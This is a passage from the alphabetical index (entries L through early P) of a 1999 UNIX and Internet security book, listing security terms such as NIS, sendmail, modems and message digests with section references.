-e option : 5.2.5.1. AIX Access Control Lists<br />

-F option : 5.1.4. Using the ls Command<br />

-g option : 5.1.4. Using the ls Command<br />

-H option : 5.9.2. Context-Dependent Files<br />

-i option : 9.2.2.1. Simple listing<br />

-l option<br />

5.1.4. Using the ls Command<br />

5.2.5.1. AIX Access Control Lists<br />

5.5.1. SUID, SGID, and Sticky Bits<br />

-q option : 5.4. Using Directory Permissions<br />

-u option : 5.1.5. File Times<br />

-c option : 24.4.1.6. Changes to startup files<br />

-H option : 24.4.1.7. Hidden files and directories<br />

-l option : 24.4.1.6. Changes to startup files<br />

lsacl command : 5.2.5.2. HP-UX access control lists<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (8 of 9) [2002-04-12 10:43:49]


Index<br />

lsof program : 25.2.2.7. Hidden space<br />

lstat function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Lucifer algorithm<br />

6.4.4. DES<br />

6.4.4.3. DES strength<br />

LUCIFER cipher : 6.4.4. DES<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (9 of 9) [2002-04-12 10:43:49]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: M<br />

MAC (Mandatory Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

MACH operating system : 1.3. History of <strong>UNIX</strong><br />

machine name : 16.2.3. Hostnames<br />

MACHINE= command<br />

15.5.1.2. Name-value pairs<br />

15.5.2. Permissions Commands<br />

Macintosh, Web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

macro virus : (see viruses)<br />

magic cookies : 17.3.21.4. Using Xauthority magic cookies<br />

magic number : 5.1.7. File Permissions in Detail<br />

mail<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

(see also sendmail)<br />

accepted by programs : 17.3.4.1. sendmail and security<br />

action, in Swatch program : 10.6.2. The Swatch Configuration File<br />

alias back door : 11.1.2. Back Doors and Trap Doors<br />

aliases : (see aliases)<br />

copyrights on : 26.4.2. Copyright Infringement<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

firewalls : 21.4.2. Electronic Mail<br />

forwarding (UUCP) : 15.6.1. Mail Forwarding for UUCP<br />

harassment via : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

logging : 10.4.2. Mail<br />

message flooding : 25.3.2. Message Flooding<br />

phantom, monitoring : 17.3.4.2. Using sendmail to receive email<br />

receiving by sendmail : 17.3.4.2. Using sendmail to receive email<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (1 of 6) [2002-04-12 10:43:50]


Index<br />

sending via CGI scripts : 18.2.3.3. Sending mail<br />

sent directly to file : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

startup file attacks : 11.5.2.5. .forward, .procmailrc<br />

mail command : 15.1.3. mail Command<br />

Mail_Aliases table (NIS+) : 19.5.3. NIS+ Tables<br />

mailing lists<br />

E.1. Mailing Lists<br />

E.1.3.10. WWW-security<br />

maintenance mode : C.5.1. Process #1: /etc/init<br />

maintenance personnel : 13.3. Outsiders<br />

makedbm program : 19.4.4.1. Setting up netgroups<br />

malware : 11.1. Programmed Threats: Definitions<br />

man pages : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

management, role of<br />

2.3.4. Convincing Management<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

MANs (Metropolitan Networks) : 16.1. Networking<br />

manual logging<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

manual pages : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

maps, NIS : (see NIS)<br />

Massey, James L. : 6.4.1. Summary of Private Key Systems<br />

Master mode (uucico) : 15.1.4. How the UUCP Commands Work<br />

master server<br />

19.4. Sun's Network Information Service (NIS)<br />

(see also NIS)<br />

MCERT : F.3.4.21. Motorola, Inc. and subsidiaries<br />

MCI Corporation : F.3.4.19. MCI Corporation<br />

MD2 algorithm : 6.5.4.1. MD2, MD4, and MD5<br />

MD4 algorithm : 6.5.4.1. MD2, MD4, and MD5<br />

MD5 algorithm<br />

6.5.2. Using Message Digests<br />

6.5.4.1. MD2, MD4, and MD5<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (2 of 6) [2002-04-12 10:43:50]


Index<br />

23.5.1. Use Message Digests for Storing Passwords<br />

23.9. A Good Random Seed Generator<br />

digital signatures versus : 6.6.3.6. PGP detached signatures<br />

in POP : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

media : 12.3.3. Other Media<br />

damaged by smoke : 12.2.1.2. Smoke<br />

destroying : 12.3.2.3. Sanitize your media before disposal<br />

failure of : 7.1.4. Guarding Against Media Failure<br />

hard/soft disk quotas : 25.2.2.5. Using quotas<br />

print through process : 12.3.2.1. Verify your backups<br />

rotating for backups : 7.1.3. Types of Backups<br />

rotation of : 7.2.1.2. Media rotation<br />

sanitizing : 12.3.2.3. Sanitize your media before disposal<br />

viruses from : 11.1.5. Viruses<br />

meet-in-the-middle attacks : 6.4.5.1. Double DES<br />

memory<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

hidden space : 25.2.2.7. Hidden space<br />

reserved space : 25.2.2.6. Reserved space<br />

swap space : 25.2.3. Swap Space Problems<br />

/tmp directory and : 25.2.4. /tmp Problems<br />

tree-structure attacks : 25.2.2.8. Tree-structure attacks<br />

Merkle, Ralph : 6.4.5.1. Double DES<br />

Message Authentication Code (MAC) : 6.5.5.2. Message authentication codes<br />

message digests<br />

6.5. Message Digests and Digital Signatures<br />

6.5.2. Using Message Digests<br />

9.2.3. Checksums and Signatures<br />

23.5.1. Use Message Digests for Storing Passwords<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (3 of 6) [2002-04-12 10:43:50]


Index<br />

message flooding : 25.3.2. Message Flooding<br />

messages log file : 10.2.3. messages Log File<br />

meta characters : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

metadata<br />

9.2.2. Checklists and Metadata<br />

9.2.2.2. Ancestor directories<br />

Metropolitan Networks (MANs) : 16.1. Networking<br />

MH (mail handler) : 11.5.2.5. .forward, .procmailrc<br />

Micro-BIT Virus Center : F.3.4.16. Germany: Southern area<br />

Miller, Barton : 23.1.2. An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities<br />

MILNET : F.3.4.20. MILNET<br />

MIME : 11.1.5. Viruses<br />

MIT-KERBEROS-5 authentication : 17.3.21.3. The xhost facility<br />

Mitnick, Kevin : 27.2.6. Network Providers that Network Too Well<br />

mkpasswd program : 8.8.4. Password Generators<br />

mktemp function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

MLS (Multilevel <strong>Sec</strong>urity) environment : "<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

mobile network computing : 8.7. One-Time Passwords<br />

modems<br />

14. Telephone <strong>Sec</strong>urity<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

callback setups<br />

14.4.2.<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

clogging : 25.3.4. Clogging<br />

encrypting : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

hanging up : (see signals)<br />

physical security of<br />

14.5.4. Physical Protection of Modems<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

recording call information : 10.3.1. aculog File<br />

tracing connections<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (4 of 6) [2002-04-12 10:43:50]


Index<br />

<strong>UNIX</strong> and<br />

14.5. Modems and <strong>UNIX</strong><br />

modification times<br />

5.1.2. Inodes<br />

14.5.3.3. Privilege testing<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

monitoring<br />

hardware for : (see detectors)<br />

intruders : 24.2.3. Monitoring the Intruder<br />

performance : 13.2.3. Performance Reviews and Monitoring<br />

security : (see logging)<br />

users : 26.2.6. Other Tips<br />

monitors and screen savers : 12.3.5.2. X screen savers<br />

Morris, Robert T.<br />

1. Introduction<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

motd file : 26.2.6. Other Tips<br />

Motorola, Inc. : F.3.4.20. MILNET<br />

Motorola, Inc. and subsidiaries : F.3.4.21. Motorola, Inc. and subsidiaries<br />

mount command : 20.3. Client-Side NFS <strong>Sec</strong>urity<br />

-nodev option : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

-nosuid option : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mounted filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mouting filesystem : (see directories)<br />

mrand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

mtime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

9.2.2. Checklists and Metadata<br />

24.4.1.6. Changes to startup files<br />

MUDs (Multiuser Dungeons) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (5 of 6) [2002-04-12 10:43:50]


Index<br />

Muffet, Alec : 10.5.3.1. Beware false log entries<br />

multicast groups : 16.2.1.2. Classical network addresses<br />

MULTICS (Multiplexed Information and Computing Service) : 1.3. History of <strong>UNIX</strong><br />

multilevel security<br />

1.3. History of <strong>UNIX</strong><br />

2.4.4.7. Defend in depth<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

17.2. Controlling Access to Servers<br />

multitasking<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

C.1.3.3. Process priority and niceness<br />

multiuser operating systems : 1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

multiuser workstations : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

munitions export : 26.4.1. Munitions Export<br />

MX record type : 17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

MYNAME= command : 15.5.2. Permissions Commands<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_m.htm (6 of 6) [2002-04-12 10:43:50]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: N<br />

name service<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

security and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

name-value pairs in BNU UUCP : 15.5.1.2. Name-value pairs<br />

named daemon : 16.2.6.1. DNS under <strong>UNIX</strong><br />

named nameserver : 17.3.6.2. DNS nameserver attacks<br />

named-xfer program : 16.2.6.1. DNS under <strong>UNIX</strong><br />

named.boot file<br />

17.3.6.1. DNS zone transfers<br />

17.3.6.2. DNS nameserver attacks<br />

names<br />

choosing UUCP : 15.5.2. Permissions Commands<br />

computer<br />

16.2.3. Hostnames<br />

16.2.3.1. The /etc/hosts file<br />

user : (see usernames)<br />

nameserver attacks, DNS : 17.3.6.2. DNS nameserver attacks<br />

nameserver cache loading : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

NASA<br />

Ames Research Center : F.3.4.22. NASA: Ames Research Center<br />

NASA: Goddard Space Flight Center : F.3.4.23. NASA: Goddard Space Flight Center<br />

National Aeronautical Space Agency : (see NASA)<br />

National Computer <strong>Sec</strong>urity Center (NCSC) : F.2.1. National Institute of Standards and Technology<br />

(NIST)<br />

National Institute of Standards and Technology : (see NIST)<br />

National Science Foundation Network : (see networks, NFSNET)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (1 of 8) [2002-04-12 10:43:51]


Index<br />

national security : 26.2.2. Federal Jurisdiction<br />

natural disasters<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

7.1.1.1. A taxonomy of computer failures<br />

7.1.6.1. Physical security for backups<br />

12.2.1.1. Fire<br />

(see also physical security)<br />

accidents : 12.2.2. Preventing Accidents<br />

earthquakes : 12.2.1.4. Earthquake<br />

fires<br />

12.2.1.1. Fire<br />

12.2.1.2. Smoke<br />

lightning<br />

12.2. Protecting Computer Hardware<br />

12.2.1.9. Lightning<br />

natural gas : 12.2.1.5. Explosion<br />

Naval Computer Incident Response Team (NAVCIRT) : F.3.4.44. U.S. Department of the Navy<br />

ncheck command : 5.5.4.1. The ncheck command<br />

-s option<br />

5.5.4.1. The ncheck command<br />

5.6. Device Files<br />

NCSA HTTPD server : 10.3.5. access_log Log File<br />

NCSA server : (see Web servers)<br />

NCSC (National Computer <strong>Sec</strong>urity Center) : F.2.1. National Institute of Standards and Technology<br />

(NIST)<br />

needexpnhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

needmailhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

needvrfyhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

nested directories : 25.2.2.8. Tree-structure attacks<br />

Netgroup table (NIS+) : 19.5.3. NIS+ Tables<br />

netgroups, NIS<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

limiting imported accounts : 19.4.4.2. Using netgroups to limit the importing of accounts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (2 of 8) [2002-04-12 10:43:51]


Index<br />

NetInfo<br />

3.2.2. The /etc/passwd File and Network Databases<br />

16.2.6.2. Other naming services<br />

Netmasks table (NIS+) : 19.5.3. NIS+ Tables<br />

netnews~firewalls : 21.4.3. Netnews<br />

.netrc file : 10.4.3. Network Setup<br />

Netscape Navigator<br />

encryption system of : 18.4.1. Eavesdropping Over the Wire<br />

random number generator : 23.8. Picking a Random Seed<br />

netstat command<br />

17.5. Monitoring Your Network with netstat<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

-a option : 17.5. Monitoring Your Network with netstat<br />

-n option : 17.5. Monitoring Your Network with netstat<br />

network connections : 17.3.3. TELNET (TCP Port 23)<br />

network databases : 3.2.2. The /etc/passwd File and Network Databases<br />

Network Filesystem : (see NFS)<br />

network filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

Network Information Center (NIC) : 24.2.4.2. How to contact the system administrator of a computer<br />

you don't know<br />

Network Information System : (see NIS)<br />

Network News Transport Protocol : (see NNTP)<br />

network providers : 27.2.6. Network Providers that Network Too Well<br />

network services<br />

17. TCP/IP Services<br />

17.7. Summary<br />

23.3. Tips on Writing Network Programs<br />

DNS : (see DNS)<br />

encryption with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

finger : (see finger command)<br />

FTP : (see FTP)<br />

NNTP : (see NNTP)<br />

NTP : (see NTP)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (3 of 8) [2002-04-12 10:43:51]


Index<br />

passwords for : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

POP : (see POP)<br />

root account with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

securing : 19.1. <strong>Sec</strong>uring Network Services<br />

SMTP : (see SMTP)<br />

SNMP : (see SNMP)<br />

spoofing : 17.5. Monitoring Your Network with netstat<br />

systat : 17.3.1. systat (TCP Port 11)<br />

table of : G. Table of IP Services<br />

Telnet : (see Telnet utility)<br />

TFTP : (see TFTP)<br />

UUCP over TCP : 17.3.20. UUCP over TCP (TCP Port 540)<br />

Network Time Protocol : (see NTP)<br />

network weaving : 16.1.1.1. Who is on the <strong>Internet</strong>?<br />

networks<br />

10Base-T : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

allowing threats from : 11.4. Entry<br />

ARPANET : 16.1.1. The <strong>Internet</strong><br />

backing up<br />

7.2.2. Small Network of Workstations and a Server<br />

7.2.4. Large Service-Based Networks with Large Budgets<br />

backups across : 7.4.5. Backups Across the Net<br />

cables for : 12.2.4.2. Network cables<br />

checklist for<br />

A.1.1.15. Chapter 16: TCP/IP Networks<br />

A.1.1.16. Chapter 17: TCP/IP Services<br />

configuration files : 10.4.3. Network Setup<br />

connectors for : 12.2.4.3. Network connectors<br />

cutting cables : 25.1. Destructive Attacks<br />

denial of service on<br />

25.3. Network Denial of Service Attacks<br />

25.3.4. Clogging<br />

disabling physically : 25.3.3. Signal Grounding<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (4 of 8) [2002-04-12 10:43:51]


Index<br />

<strong>Internet</strong> : 16.1.1. The <strong>Internet</strong><br />

LANs : (see LANs)<br />

logging across : 10.5.2.2. Logging across the network<br />

logging services of : 10.3.6. Logging Network Services<br />

MANs : 16.1. Networking<br />

mobile computing : 8.7. One-Time Passwords<br />

monitoring with netstat : 17.5. Monitoring Your Network with netstat<br />

NFSNET : 16.1.1. The <strong>Internet</strong><br />

packet-switching : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

scanning : 17.6. Network Scanning<br />

security references : D.1.8. Network Technology and <strong>Sec</strong>urity<br />

services for : 11.1.2. Back Doors and Trap Doors<br />

sniffers : 16.3. IP <strong>Sec</strong>urity<br />

spoofed connection : 8.5.3.1. Trusted path<br />

TCP/IP : (see TCP/IP, networks)<br />

<strong>UNIX</strong> and : 16.1.2. Networking and <strong>UNIX</strong><br />

UUCP over : 15.8. UUCP Over Networks<br />

WANs : 16.1. Networking<br />

Networks table (NIS+) : 19.5.3. NIS+ Tables<br />

networks, computer : 1.4.3. Add-On Functionality Breeds Problems<br />

Neumann, Peter : 1.3. History of <strong>UNIX</strong><br />

newgrp command : 4.1.3.2. Groups and older AT&T <strong>UNIX</strong><br />

newkey -u command<br />

19.3.2.1. Creating passwords for users<br />

19.5.4.2. When a user's passwords don't match<br />

news : (see Usenet)<br />

news (user) : 4.1. Users and Groups<br />

newsgroups, defamation/harassment via : 26.4.7. Harassment, Threatening Communication, and<br />

Defamation<br />

NEXTSTEP Window Server (NSWS) : 17.3.16. NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NFS (Network Filesystem) : 19. RPC, NIS, NIS+, and Kerberos<br />

authentication and<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (5 of 8) [2002-04-12 10:43:51]


Index<br />

checklist for : A.1.1.19. Chapter 20: NFS<br />

file permissions : 5.1.7. File Permissions in Detail<br />

find command on : 5.5.4. Finding All of the SUID and SGID Files<br />

-local option : 11.6.1.2. Writable system files and directories<br />

MOUNT : 20.1.1. NFS History<br />

<strong>Sec</strong>ure NFS : (see <strong>Sec</strong>ure NFS)<br />

server, and UUCP : 15.3. UUCP and <strong>Sec</strong>urity<br />

technical description of : 20.1.1. NFS History<br />

and trusted hosts : 17.3.18.2. The problem with trusted hosts<br />

-xdev option : 11.6.1.2. Writable system files and directories<br />

NIC (Network Information Center) : 24.2.4.2. How to contact the system administrator of a computer<br />

you don't know<br />

nice command : 25.2.1.2. System overload attacks<br />

nice numbers : C.1.3.3. Process priority and niceness<br />

NIS (Network Information Service)<br />

+ in<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.4.6. NIS is confused about "+"<br />

clients : 19.4. Sun's Network Information Service (NIS)<br />

domains : 19.4.3. NIS Domains<br />

maps : 19.4. Sun's Network Information Service (NIS)<br />

netgroups<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

limiting imported accounts : 19.4.4.2. Using netgroups to limit the importing of accounts<br />

<strong>Sec</strong>ure RPC with<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

spoofing : 19.4.4.5. Spoofing NIS<br />

UDP : 16.2.4.3. UDP<br />

Yellow Pages : 16.2.6.2. Other naming services<br />

NIS (Network Information System)<br />

3.2.2. The /etc/passwd File and Network Databases<br />

3.4. Changing Your Password<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (6 of 8) [2002-04-12 10:43:51]


Index<br />

NIS+<br />

19. RPC, NIS, NIS+, and Kerberos<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.5. Unintended Disclosure of Site Information with NIS<br />

3.2.2. The /etc/passwd File and Network Databases<br />

3.4. Changing Your Password<br />

16.2.6.2. Other naming services<br />

19.5. Sun's NIS+<br />

19.5.5. NIS+ Limitations<br />

integrity-checking software for : 19.5.5. NIS+ Limitations<br />

principals : 19.5.1. What NIS+ Does<br />

<strong>Sec</strong>ure RPC with<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

nisaddcred command : 19.3.1.1. Proving your identity<br />

niscat command : 3.2.2. The /etc/passwd File and Network Databases<br />

nischown command : 19.5.4. Using NIS+<br />

nispasswd command<br />

3.4. Changing Your Password<br />

19.5.4. Using NIS+<br />

19.5.4.2. When a user's passwords don't match<br />

NIST (National Institute of Standards and Technology)<br />

F.2.1. National Institute of Standards and Technology (NIST)<br />

F.3.4.26. NIST (National Institute of Standards and Technology)<br />

NNTP (Network News Transport Protocol) : 17.3.13. Network News Transport Protocol (NNTP) (TCP<br />

Port 119)<br />

nobody (user)<br />

4.1. Users and Groups<br />

19.3.2.1. Creating passwords for users<br />

noexpn (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

noise, electrical : 12.2.1.8. Electrical noise<br />

nonadaptive modems : (see modems)<br />

nonblocking systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

nonce : 23.3. Tips on Writing Network Programs<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (7 of 8) [2002-04-12 10:43:51]


Index<br />

nonrepudiation : 6.5. Message Digests and Digital Signatures<br />

NORDUNET : F.3.4.27. NORDUNET: Denmark, Sweden, Norway, Finland, Iceland<br />

NOREAD= command : 15.5.2. Permissions Commands<br />

Northwestern University : F.3.4.28. Northwestern University<br />

nosuid : 11.1.2. Back Doors and Trap Doors<br />

Novell : 1.3. History of <strong>UNIX</strong><br />

novrfy (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

Nowitz, David : 15.2. Versions of UUCP<br />

NOWRITE= command : 15.5.2. Permissions Commands<br />

npasswd package : 8.8.2. Constraining Passwords<br />

NPROC variable : 25.2.1.1. Too many processes<br />

NSA (National <strong>Sec</strong>urity Agency) : F.2.2. National <strong>Sec</strong>urity Agency (NSA)<br />

NSWS (NextStep Window Server) : 17.3.16. NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NTP (Network Time Protocol) : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

<strong>Sec</strong>ure RPC and : 19.3.1.3. Setting the window<br />

NU-CERT : F.3.4.28. Northwestern University<br />

null device : 5.6. Device Files<br />

nuucp account<br />

15.1.4. How the UUCP Commands Work<br />

15.3.1. Assigning Additional UUCP Logins<br />

15.4.1.3. Format of USERFILE entry without system name<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_n.htm (8 of 8) [2002-04-12 10:43:51]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: O<br />

obscurity : (see security, through obscurity)<br />

octal file permissions<br />

5.2.3. Calculating Octal File Permissions<br />

5.2.4. Using Octal File Permissions<br />

octets : 16.2.1. <strong>Internet</strong> Addresses<br />

Odlyzko, Andrew : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

OFB (output feedback) : 6.4.4.2. DES modes<br />

on-the-job security<br />

13.2. On the Job<br />

13.2.6. Departure<br />

one : 9.2.1. Comparison Copies<br />

one-command accounts : 8.1.3. Accounts That Run a Single Command<br />

one-time pad encryption<br />

6.4.7. An Unbreakable Encryption Algorithm<br />

8.7.3. Code Books<br />

one-time passwords<br />

3.7. One-Time Passwords<br />

8.7. One-Time Passwords<br />

8.7.3. Code Books<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

23.3. Tips on Writing Network Programs<br />

one-way phone lines : 14.4.1. One-Way Phone Lines<br />

open access, tradition of : 1.4.1. Expectations<br />

open accounts<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

8.8.7. Algorithm and Library Changes<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_o.htm (1 of 3) [2002-04-12 10:43:52]


Index<br />

open command : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

O_CREAT and O_EXCL flags : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Open Software Distribution (OSD) : Preface<br />

Open Software Foundation (OSF) : 1.3. History of <strong>UNIX</strong><br />

open system call : 5.1.7. File Permissions in Detail<br />

Open System Interconnection (OSI) : 16.4.4. OSI<br />

opendir library call : 5.4. Using Directory Permissions<br />

operating systems<br />

1.2. What Is an Operating System?<br />

12.3.3. Other Media<br />

keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

operating systems<br />

Which <strong>UNIX</strong> System?<br />

(see also under specific name)<br />

optic cables : (see cables, network)<br />

optical vampire taps : 12.3.1.5. Fiber optic cable<br />

Options command : 18.3.2. Commands Within the Block<br />

Orange Book : 2.3.3. Adding Up the Numbers<br />

originate mode : 14.3.1. Originate and Answer<br />

originate testing : 14.5.3.1. Originate testing<br />

OSF (Open Software Foundation) : 1.3. History of <strong>UNIX</strong><br />

OSF/1 operating system : 1.3. History of <strong>UNIX</strong><br />

OSI (Open System Interconnection) : 16.4.4. OSI<br />

Outcome table (NIS+) : 19.5.3. NIS+ Tables<br />

outgoing calls : 14.5. Modems and <strong>UNIX</strong><br />

outgoing mail, logging : 10.4.2. Mail<br />

output feedback (OFB) : 6.4.4.2. DES modes<br />

outsiders : 13.3. Outsiders<br />

overload attacks<br />

25.2. Overload Attacks<br />

25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

overtime : 13.2.3. Performance Reviews and Monitoring<br />

overwriting media : 12.3.2.3. Sanitize your media before disposal<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_o.htm (2 of 3) [2002-04-12 10:43:52]


Index<br />

OW- (sendmail.cf) : 17.3.4.2. Using sendmail to receive email<br />

owners of information : 2.4.4.1. Assign an owner<br />

owners, changing : 5.7. chown: Changing a File's Owner<br />

ownership notices : 26.2.6. Other Tips<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_o.htm (3 of 3) [2002-04-12 10:43:52]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: P<br />

pacct file : 10.2. The acct/pacct Process Accounting File<br />

pack program : 6.6.1.2. Ways of improving the security of crypt<br />

packet sniffing : 16.3.1. Link-level <strong>Sec</strong>urity<br />

packet-switching networks : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

packets : (see IP packets)<br />

paper<br />

backups on : 24.5.1. Never Trust Anything Except Hardcopy<br />

copies : 7.3.2. Building an Automatic Backup System<br />

logging on : 10.7. Handwritten Logs<br />

shredders for : 12.3.3. Other Media<br />

throwing out : 12.3.3. Other Media<br />

parent processes : C.2. Creating Processes<br />

partitions : 25.2.2.4. Using partitions to protect your users<br />

backup by : 7.1.3. Types of Backups<br />

